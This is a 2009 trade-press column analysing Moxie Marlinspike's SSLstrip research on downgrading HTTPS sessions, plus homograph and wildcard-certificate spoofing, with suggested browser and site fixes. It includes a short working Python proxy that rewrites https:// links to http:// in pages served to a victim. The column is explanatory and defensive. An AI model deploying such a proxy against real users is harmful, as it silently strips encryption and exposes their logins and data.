
Mike Fratto, Former Network Computing Editor

February 20, 2009


Moxie Marlinspike's presentation New Tricks for Defeating SSL in Practice should be an eye-opener on the fragility of the trust we place in secure Web sites. Marlinspike uses some fairly mundane technical tricks coupled with astute observations about human behavior to pull off a difficult task -- seamlessly subverting the indicators of HTTPS Web sites presented to a user and fooling the victim into trusting a site when they shouldn't.

First off, SSL isn't broken, and Marlinspike doesn't say that, either. What is broken is how users distinguish a secure Web session from an insecure one. Marlinspike pulls off this trickery pretty easily by proxying SSL connections, rewriting HTTPS URLs to HTTP URLs, capturing data in between, and presenting to the user a seamless, secure-looking Web session. SSLstrip will be available on Marlinspike's Web site thoughtcrime.com later this week. It's a technical implementation of social engineering, an observation Tom Claburn made in Black Hat: Security Pro Shows How To Bypass SSL.
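To make the mechanics concrete, here is a minimal sketch of the downgrade idea -- not Marlinspike's SSLstrip itself, which does considerably more (cookies, POSTs, the favicon trick) -- just the core move: a plain-HTTP proxy that fetches pages over HTTPS upstream and rewrites every https:// link to http:// before serving it. The hostname and port are illustrative assumptions.

```python
# A stripped-down illustration of the downgrade attack (NOT the real
# SSLstrip): the victim talks plain HTTP to this proxy, the proxy talks
# HTTPS to the real site, and every https:// link in the returned page
# is rewritten to http:// so the browser never starts an SSL session.
import http.server
import urllib.request

UPSTREAM = "www.example.com"  # hypothetical target site

class StripHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Attacker-side leg is HTTPS; victim-side leg stays HTTP.
        url = "https://%s%s" % (UPSTREAM, self.path)
        with urllib.request.urlopen(url) as resp:
            body = resp.read()
            ctype = resp.headers.get("Content-Type", "text/html")
        # The core trick: downgrade every secure link before serving.
        body = body.replace(b"https://", b"http://")
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    http.server.HTTPServer(("127.0.0.1", 8080), StripHandler).serve_forever()
```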

I teach a graduate class on network security at Syracuse University. A few weeks ago we were talking about secure e-mail and whether you should sign the plaintext first and then encrypt the message, or encrypt the plaintext and then sign the encrypted message. I posed the question in terms of what it means to sign something. If you sign the plaintext, you are asserting knowledge of the message. If you sign the encrypted message, you don't know what you are signing -- it's encrypted. Truth is, in either case you don't really know what you are signing, because the program does the work on your behalf and you don't see it. The program could insert anything into the message you have just signed. I'm not going to get esoteric on you. My point is that we trust that our programs are working properly based on visual cues from those programs. That's reasonable.
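For the curious, here is a toy sketch of the two orderings using RSA from the pyca/cryptography package. The keys and message are throwaway assumptions, and real secure e-mail (S/MIME, OpenPGP) wraps these operations in far more structure; the point is only what bytes each signature covers.

```python
# pip install cryptography
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

signer = rsa.generate_private_key(public_exponent=65537, key_size=2048)
recipient = rsa.generate_private_key(public_exponent=65537, key_size=2048)

message = b"Pay Alice $100"
pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                  salt_length=padding.PSS.MAX_LENGTH)
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Sign-then-encrypt: the signature covers the plaintext, so it asserts
# knowledge of what the message actually says.
inner_sig = signer.sign(message, pss, hashes.SHA256())
ciphertext = recipient.public_key().encrypt(message, oaep)

# Encrypt-then-sign: the signature covers opaque ciphertext -- the
# signer is vouching for bytes it cannot read.
ciphertext2 = recipient.public_key().encrypt(message, oaep)
outer_sig = signer.sign(ciphertext2, pss, hashes.SHA256())
```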

Go to your bank's Web site. Chances are that the URL is of the form http://www.yourbank.com. If you try SSL, you can enter https://www.yourbank.com and you will have an SSL-enabled session. But look at the two different sites. Do you see any difference? If your bank isn't using an Extended Validation certificate, chances are the only indicators are a lock somewhere on your browser and the 's' in https. Otherwise the site looks the same. Marlinspike makes an amusing point during his presentation: there is little to indicate when you are using an HTTP session versus an HTTPS one. He even went to the trouble of creating a favicon shaped like a lock -- a favicon is that little logo-looking thing you see next to the URL in the address bar. I think if I were to see a lock next to an HTTP URL, I'd be confused and have to go figure out what was going on.

Then, just to wrap everything into a neat little package, he goes on to present a twist on that scenario in which, using a wildcard SSL certificate and internationalized domain names (IDN), an attacker can seamlessly proxy SSL connections with no visual cues, unbeknownst to the user. Web site certificates are usually tied to a specific host name like www.example.com; a wildcard certificate can be used for any host in the example.com domain. Internationalized domain names allow countries whose alphabets aren't ASCII-based to use their own letters and symbols in domain names. However, many IDN characters render identically, or nearly so, to ASCII characters. These homograph attacks, combined with wildcard certificates, can hide what is really happening from the casual user.
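A few lines of Python make the homograph point concrete. The look-alike hostname below is an illustrative assumption, not the one from Marlinspike's demo:

```python
# The second letter of "fake" is CYRILLIC SMALL LETTER A (U+0430),
# which most fonts render identically to a Latin "a" -- yet DNS sees
# two unrelated domains once the name is converted to punycode.
import unicodedata

real = "paypal.com"
fake = "p\u0430ypal.com"

print(real == fake)               # False: different code points
print(unicodedata.name(fake[1]))  # CYRILLIC SMALL LETTER A
print(fake.encode("idna"))        # the xn-- form actually resolved
```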

It's pretty clever and works because the application seems to behave normally. In an e-mail, Marlinspike elaborated:

The initial vector that I outline here -- attacking the bridge between HTTP and HTTPS -- is only the beginning for a new class of attacks. I disclosed one of those (the homograph stuff), but there's actually a whole world of places that you can go from there which I did not disclose. Those can tolerate a much less forgiving user.

Any individual browser or site operator isn't going to be able to do much to protect against this, short of trying to deploy Band-Aids that will only result in an arms race (at best).

Extended Validation To The Rescue?

No, extended validation certificates are not the answer. Not really. EV certificates are supposed to engender more trust in a Web site because a group of certificate authorities agreed on a common set of steps to authenticate a domain owner prior to issuing a digital certificate. I applaud the EV certificate authorities for agreeing on a common set of criteria to identify an entity before issuing an EV certificate, and visual cues like the green address bar in IE7 and Firefox 3 are much more pronounced than a little golden lock off in a corner. But the fact remains that the user still has to differentiate between SSL sites and non-SSL sites. It's just one more confusing visual cue added to a whole string of confusing visual cues.

The whole mess is exacerbated by too many formats, too many displays, and too much reliance on users to interpret visual indicators. Today you can see a green address bar, a green indicator, a white address bar, a red address bar, a red indicator, a lock, or no lock. Unless you know what those things mean and where they show up in the browser during normal operation, it's all confusing. Marlinspike's demonstration used an image of a lock as a favicon (the common indicator of an SSL site) to fool the user into thinking they are at an SSL-enabled site. But the lock is in the wrong place -- to the left of the address bar. The SSL lock in Firefox is in the status bar, and in IE it is to the right of the address bar. But you have to know that.

I don't know what the solution is. If I did, I'd be seeking venture capital and working on an elevator pitch. But I think there are four things that can help:

  1. There needs to be a consistent user interface, one all browsers conform to, that shows when SSL is enabled and when it isn't -- meaning all browsers put the SSL indicator in the same place and display it in the same fashion. The indicator should be beyond the control of the Web page and of any media, like a favicon, sent from the Web server.

  2. Web site owners like financial institutions that today mix HTTP with HTTPS should stop using HTTP and move their entire sites to HTTPS. Even a redirect from HTTP to HTTPS is OK. PayPal does this. If you get to PayPal.com and it is not HTTPS, then you know you have a problem. But even PayPal isn't consistent: many of its footer links are HTTP links and should be HTTPS. Correction: The links in the page are HTTP, but they redirect to HTTPS.

  3. In Web browsers, there should be a clear indicator of the top- and second-level domain of the site you are visiting (see the sketch after this list). Marlinspike's homograph demonstration relied on the portion of the URL containing the real domain name being pushed off the end of the address bar.

  4. Finally, if these changes are instituted, there needs to be a concerted outreach effort by all parties explaining clearly what indicators look like and that abnormal indicators should not be trusted. Users are smart if you give them a chance. But don't expect them to be experts. You drive a car without knowing how to change the oil, right?
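On point 3, here is a naive sketch of surfacing the registrable domain. A real browser would need the Public Suffix List to handle multi-label suffixes like .co.uk, so treat the two-label split as a deliberate simplification; the attack URL is hypothetical.

```python
# Surface the registrable domain of a URL so a long look-alike
# hostname can't hide it off the end of the address bar.
from urllib.parse import urlsplit

def registrable_domain(url: str) -> str:
    host = urlsplit(url).hostname or ""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host

# The real domain is the attacker's, not the bank's:
print(registrable_domain("http://www.yourbank.com.evil.example/login"))
# -> "evil.example"
```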

The sad truth is, none of these suggestions will be adopted. They are too disruptive, and everyone from browser vendors to Web site owners is too afraid of rocking the boat. SSL failures should be treated as failures, but instead users are allowed to bypass them easily, a habit reinforced by years of clicking through error dialogs. Many years ago I advocated that financial institutions shouldn't send e-mails with links in them because that reinforces insecure behavior -- if it looks like my bank's e-mail, it must be my bank's e-mail -- which enables phishing. But I still get them in my inbox.

Users are smart. Users want to know when they are protected and when they aren't. But inconsistent UIs and Web applications aren't the answer.

About the Author(s)

Mike Fratto

Former Network Computing Editor

Mike Fratto is a principal analyst at Current Analysis, covering the Enterprise Networking and Data Center Technology markets. Prior to that, Mike was with UBM Tech for 15 years, and served as editor of Network Computing. He was also lead analyst for InformationWeek Analytics and executive editor for Secure Enterprise. He has spoken at several conferences including Interop, MISTI, the Internet Security Conference, as well as to local groups. He served as the chair for Interop's datacenter and storage tracks. He also teaches a network security graduate course at Syracuse University. Prior to Network Computing, Mike was an independent consultant.

